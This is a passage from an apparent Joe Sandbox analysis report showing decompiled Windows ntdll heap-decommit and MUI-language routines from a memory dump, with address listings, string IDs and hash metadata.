						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E017BA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x18a8748 - 1;
						if( *0x18a8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E017BB150();
								} else {
									E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E017BB150();
								__eflags =  *0x18a7bc8;
								if( *0x18a7bc8 == 0) {
									__eflags = 1;
									E01872073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x18a8748 - 1;
							if( *0x18a8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E017E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E017D7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E018714FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E017B9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E017B9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x18a8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E017BB150();
											} else {
												E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E017BB150();
											_pop(_t491);
											__eflags =  *0x18a7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01872073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0187A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E017DA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E017D7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E017D7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01871411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E017D7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E017D7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x18a8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E017BB150();
							} else {
								E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E017BB150();
							__eflags =  *0x18a7bc8;
							if( *0x18a7bc8 == 0) {
								__eflags = 0;
								E01872073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x18a8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E017BB150();
												} else {
													E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E017BB150();
												__eflags =  *0x18a7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01872073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0187A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E017DA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E017DB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E017DA830(_t553, _v64, _v24);
								_t286 = E017D7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E017D7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01871411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E017D7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E017D7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01871411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E017E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E017DB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E017D7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E018714FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E017D99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E017DA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E017EABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                    0x017da309
                                                    0x017da316
                                                    0x017da319
                                                    0x017da31d
                                                    0x017da32d
                                                    0x017da331
                                                    0x01821e0d
                                                    0x01821e10
                                                    0x017da3cb
                                                    0x017da3cb
                                                    0x017da3bd
                                                    0x017da3c3
                                                    0x017da3c3
                                                    0x017da33a
                                                    0x01821e17
                                                    0x01821e1b
                                                    0x01821e1d
                                                    0x01821e2f
                                                    0x01821e34
                                                    0x01821e36
                                                    0x01821e3c
                                                    0x01821e3c
                                                    0x01821e3c
                                                    0x01821e3c
                                                    0x01821e36
                                                    0x01821e42
                                                    0x01821e45
                                                    0x01821e47
                                                    0x017da3f8
                                                    0x017da3f8
                                                    0x017da3fb
                                                    0x017da3fd
                                                    0x01821e50
                                                    0x017da403
                                                    0x017da411
                                                    0x017da411
                                                    0x017da411
                                                    0x017da41e
                                                    0x017da420
                                                    0x017da424
                                                    0x017da427
                                                    0x017da7c9
                                                    0x017da7cd
                                                    0x017da7d2
                                                    0x017da7d9
                                                    0x017da7e0
                                                    0x017da7e3
                                                    0x017da7ed
                                                    0x017da7f3
                                                    0x017da7f9
                                                    0x017da7ff
                                                    0x017da802
                                                    0x017da807
                                                    0x017da809
                                                    0x017da809
                                                    0x017da809
                                                    0x017da80f
                                                    0x017da80f
                                                    0x017da812
                                                    0x017da81c
                                                    0x017da821
                                                    0x017da824
                                                    0x017da42d
                                                    0x017da42d
                                                    0x017da42d
                                                    0x017da42d
                                                    0x017da42d
                                                    0x017da436
                                                    0x017da43a
                                                    0x017da609
                                                    0x017da60d
                                                    0x017da612
                                                    0x017da616
                                                    0x017da61a
                                                    0x01821e57
                                                    0x01821e59
                                                    0x00000000
                                                    0x00000000
                                                    0x01821e5f
                                                    0x017da620
                                                    0x017da627
                                                    0x01821e64
                                                    0x01821e66
                                                    0x01821e6c
                                                    0x01821e72
                                                    0x01821e76
                                                    0x01821e95
                                                    0x01821e9a
                                                    0x01821e78
                                                    0x01821e8d
                                                    0x01821e92
                                                    0x01821ea0
                                                    0x01821ea5
                                                    0x01821eaa
                                                    0x01821eb2
                                                    0x01821eb6
                                                    0x01821eb9
                                                    0x01821eb9
                                                    0x01821ebe
                                                    0x01821ec2
                                                    0x01821ec2
                                                    0x01821e66
                                                    0x017da62d
                                                    0x017da633
                                                    0x017da636
                                                    0x017da63a
                                                    0x017da63c
                                                    0x017da640
                                                    0x017da642
                                                    0x017da644
                                                    0x017da644
                                                    0x017da644
                                                    0x017da64d
                                                    0x017da64d
                                                    0x017da651
                                                    0x017da655
                                                    0x01821eca
                                                    0x01821ed1
                                                    0x00000000
                                                    0x00000000
                                                    0x01821ed7
                                                    0x00000000
                                                    0x017da65b
                                                    0x017da669
                                                    0x017da66e
                                                    0x017da670
                                                    0x00000000
                                                    0x00000000
                                                    0x017da676
                                                    0x017da67b
                                                    0x017da680
                                                    0x017da682
                                                    0x01821f1a
                                                    0x017da688
                                                    0x017da688
                                                    0x017da688
                                                    0x017da68a
                                                    0x017da68d
                                                    0x01821f24
                                                    0x01821f2a
                                                    0x01821f31
                                                    0x01821f43
                                                    0x01821f43
                                                    0x01821f31
                                                    0x017da693
                                                    0x017da697
                                                    0x017da69d
                                                    0x017da6a0
                                                    0x017da6a6
                                                    0x017da6a8
                                                    0x017da6a8
                                                    0x017da6a8
                                                    0x017da6a8
                                                    0x017da6b2
                                                    0x017da6b7
                                                    0x017da6c1
                                                    0x017da6c6
                                                    0x017da6d2
                                                    0x017da6d9
                                                    0x017da6e3
                                                    0x017da6e6
                                                    0x017da6eb
                                                    0x017da6ed
                                                    0x017da6ed
                                                    0x017da6ed
                                                    0x017da6ed
                                                    0x017da6f3
                                                    0x017da6f8
                                                    0x017da702
                                                    0x017da70a
                                                    0x017da70e
                                                    0x017da71a
                                                    0x017da71e
                                                    0x01821fcb
                                                    0x01821fcf
                                                    0x01821fdd
                                                    0x01821fe3
                                                    0x01821fe3
                                                    0x017da724
                                                    0x017da728
                                                    0x017da72a
                                                    0x017da72d
                                                    0x017da737
                                                    0x017da73a
                                                    0x017da73c
                                                    0x017da742
                                                    0x017da748
                                                    0x01821f4d
                                                    0x01821f50
                                                    0x01821f56
                                                    0x01821f5c
                                                    0x01821f5f
                                                    0x01821f7e
                                                    0x01821f83
                                                    0x01821f61
                                                    0x01821f76
                                                    0x01821f7b
                                                    0x01821f89
                                                    0x01821f8e
                                                    0x01821f93
                                                    0x01821f94
                                                    0x01821f9a
                                                    0x01821f9c
                                                    0x01821f9e
                                                    0x01821fa1
                                                    0x01821fa1
                                                    0x01821fa6
                                                    0x01821fa6
                                                    0x01821f50
                                                    0x017da74e
                                                    0x017da751
                                                    0x017da754
                                                    0x017da75d
                                                    0x017da75e
                                                    0x017da762
                                                    0x017da767
                                                    0x01821faf
                                                    0x01821fb0
                                                    0x01821fb9
                                                    0x01821fbe
                                                    0x01821fc2
                                                    0x01821fc2
                                                    0x017da76d
                                                    0x017da76d
                                                    0x017da775
                                                    0x017da778
                                                    0x017da77d
                                                    0x017da77d
                                                    0x017da71e
                                                    0x017da782
                                                    0x017da787
                                                    0x017da789
                                                    0x01821ff3
                                                    0x017da78f
                                                    0x017da78f
                                                    0x017da78f
                                                    0x017da791
                                                    0x017da794
                                                    0x01821ffd
                                                    0x01822006
                                                    0x0182200c
                                                    0x01822017
                                                    0x01822019
                                                    0x01822024
                                                    0x01822024
                                                    0x01822024
                                                    0x01822047
                                                    0x01822047
                                                    0x0182200c
                                                    0x017da79a
                                                    0x017da79f
                                                    0x017da7a4
                                                    0x017da7a9
                                                    0x017da7ab
                                                    0x0182205a
                                                    0x017da7b1
                                                    0x017da7b1
                                                    0x017da7b1
                                                    0x017da7b3
                                                    0x017da7b6
                                                    0x00000000
                                                    0x017da7bc
                                                    0x01822066
                                                    0x01822068
                                                    0x01822073
                                                    0x01822073
                                                    0x01822073
                                                    0x01822078
                                                    0x01822079
                                                    0x0182207d
                                                    0x00000000
                                                    0x0182207d
                                                    0x017da7b6
                                                    0x017da440
                                                    0x017da440
                                                    0x017da440
                                                    0x017da446
                                                    0x017da44c
                                                    0x017da44f
                                                    0x017da453
                                                    0x017da455
                                                    0x018220b3
                                                    0x018220b9
                                                    0x018220b9
                                                    0x017da45d
                                                    0x017da460
                                                    0x017da464
                                                    0x017da466
                                                    0x017da46b
                                                    0x017da46f
                                                    0x017da471
                                                    0x017da471
                                                    0x017da471
                                                    0x017da474
                                                    0x017da479
                                                    0x017da47d
                                                    0x017da47f
                                                    0x01822229
                                                    0x0182222f
                                                    0x017da3c8
                                                    0x017da3c8
                                                    0x017da3ca
                                                    0x017da3ca
                                                    0x00000000
                                                    0x017da3ca
                                                    0x01822235
                                                    0x0182223a
                                                    0x0182223a
                                                    0x00000000
                                                    0x00000000
                                                    0x01822240
                                                    0x01822246
                                                    0x0182224a
                                                    0x01822269
                                                    0x0182226e
                                                    0x0182224c
                                                    0x01822261
                                                    0x01822266
                                                    0x01822274
                                                    0x01822279
                                                    0x0182227e
                                                    0x01822286
                                                    0x01822288
                                                    0x0182228d
                                                    0x0182228d
                                                    0x01822292
                                                    0x01822292
                                                    0x01822295
                                                    0x01822295
                                                    0x00000000
                                                    0x01822295
                                                    0x017da485
                                                    0x017da489
                                                    0x017da48b
                                                    0x017da48f
                                                    0x017da493
                                                    0x017da497
                                                    0x017da49b
                                                    0x017da4bb
                                                    0x017da4bb
                                                    0x017da4bd
                                                    0x017da4ff
                                                    0x017da4ff
                                                    0x017da501
                                                    0x017da505
                                                    0x017da50f
                                                    0x017da517
                                                    0x017da51b
                                                    0x017da527
                                                    0x017da52b
                                                    0x01822182
                                                    0x01822185
                                                    0x01822193
                                                    0x01822199
                                                    0x01822199
                                                    0x017da531
                                                    0x017da535
                                                    0x017da538
                                                    0x017da548
                                                    0x017da54b
                                                    0x017da54d
                                                    0x017da553
                                                    0x017da559
                                                    0x01822100
                                                    0x01822103
                                                    0x01822109
                                                    0x0182210f
                                                    0x01822112
                                                    0x01822131
                                                    0x01822136
                                                    0x01822114
                                                    0x01822129
                                                    0x0182212e
                                                    0x0182213c
                                                    0x01822141
                                                    0x01822147
                                                    0x0182214d
                                                    0x01822151
                                                    0x01822154
                                                    0x01822154
                                                    0x01822159
                                                    0x01822159
                                                    0x01822103
                                                    0x017da55f
                                                    0x017da562
                                                    0x017da565
                                                    0x017da567
                                                    0x01822162
                                                    0x017da56d
                                                    0x017da574
                                                    0x017da575
                                                    0x017da579
                                                    0x017da57e
                                                    0x01822169
                                                    0x0182216a
                                                    0x01822170
                                                    0x01822175
                                                    0x01822179
                                                    0x01822179
                                                    0x017da57e
                                                    0x017da584
                                                    0x017da58f
                                                    0x017da58f
                                                    0x017da52b
                                                    0x017da5ad
                                                    0x017da5bc
                                                    0x017da5c1
                                                    0x017da5c6
                                                    0x017da5cb
                                                    0x017da5cd
                                                    0x018221a9
                                                    0x017da5d3
                                                    0x017da5d3
                                                    0x017da5d3
                                                    0x017da5d5
                                                    0x017da5d8
                                                    0x018221b3
                                                    0x018221bc
                                                    0x018221c2
                                                    0x018221cd
                                                    0x018221cf
                                                    0x018221da
                                                    0x018221da
                                                    0x018221da
                                                    0x018221f7
                                                    0x018221f7
                                                    0x018221c2
                                                    0x017da5de
                                                    0x017da5e3
                                                    0x017da5e8
                                                    0x017da5ea
                                                    0x0182220a
                                                    0x017da5f0
                                                    0x017da5f0
                                                    0x017da5f0
                                                    0x017da5f2
                                                    0x017da5f5
                                                    0x01822219
                                                    0x0182221b
                                                    0x0182208c
                                                    0x0182208c
                                                    0x0182208c
                                                    0x01822095
                                                    0x01822096
                                                    0x01822097
                                                    0x01822098
                                                    0x018220a4
                                                    0x018220a5
                                                    0x018220a9
                                                    0x018220a9
                                                    0x00000000
                                                    0x017da5f5
                                                    0x017da4bf
                                                    0x017da4d3
                                                    0x017da4d8
                                                    0x017da4da
                                                    0x01821ede
                                                    0x01821ede
                                                    0x01821ee4
                                                    0x01821ee9
                                                    0x00000000
                                                    0x00000000
                                                    0x01821f07
                                                    0x00000000
                                                    0x01821f07
                                                    0x017da4e0
                                                    0x017da4e5
                                                    0x017da4e7
                                                    0x018220cb
                                                    0x017da4ed
                                                    0x017da4ed
                                                    0x017da4ed
                                                    0x017da4f2
                                                    0x017da4f5
                                                    0x018220d5
                                                    0x018220de
                                                    0x018220e4
                                                    0x018220f6
                                                    0x018220f6
                                                    0x018220e4
                                                    0x017da4fb
                                                    0x00000000
                                                    0x017da4fb
                                                    0x017da4a1
                                                    0x017da4a4
                                                    0x017da4a8
                                                    0x00000000
                                                    0x00000000
                                                    0x017da4aa
                                                    0x017da4ac
                                                    0x00000000
                                                    0x00000000
                                                    0x017da4b2
                                                    0x017da4b5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017da4b5
                                                    0x017da43a
                                                    0x017da340
                                                    0x017da346
                                                    0x017da600
                                                    0x00000000
                                                    0x017da600
                                                    0x017da34f
                                                    0x017da351
                                                    0x017da358
                                                    0x017da3c6
                                                    0x00000000
                                                    0x017da371
                                                    0x017da37a
                                                    0x017da37f
                                                    0x017da382
                                                    0x017da384
                                                    0x017da394
                                                    0x00000000
                                                    0x017da396
                                                    0x017da399
                                                    0x017da3a7
                                                    0x017da3b0
                                                    0x017da3b4
                                                    0x017da3bb
                                                    0x017da3d2
                                                    0x017da3da
                                                    0x017da3df
                                                    0x017da3e1
                                                    0x017da3e5
                                                    0x017da3ea
                                                    0x017da3f0
                                                    0x017da3f0
                                                    0x017da3e1
                                                    0x00000000
                                                    0x017da3bb
                                                    0x017da394

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-523794902
                                                    • Opcode ID: f5752291076790278fc5628b7c47e6b6d78e0b8dec07e7d029b448c4827b7fa1
                                                    • Instruction ID: a79603f05fa4a7621e10c925239d3a9daf6183272313706516e3e706c0cab173
                                                    • Opcode Fuzzy Hash: f5752291076790278fc5628b7c47e6b6d78e0b8dec07e7d029b448c4827b7fa1
                                                    • Instruction Fuzzy Hash: 6442CD316047459FD716CF28C888A2AFBF6FF98704F144969E986CB352D734DA81CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E017C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E017C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E017C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E017C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E017C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E017C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
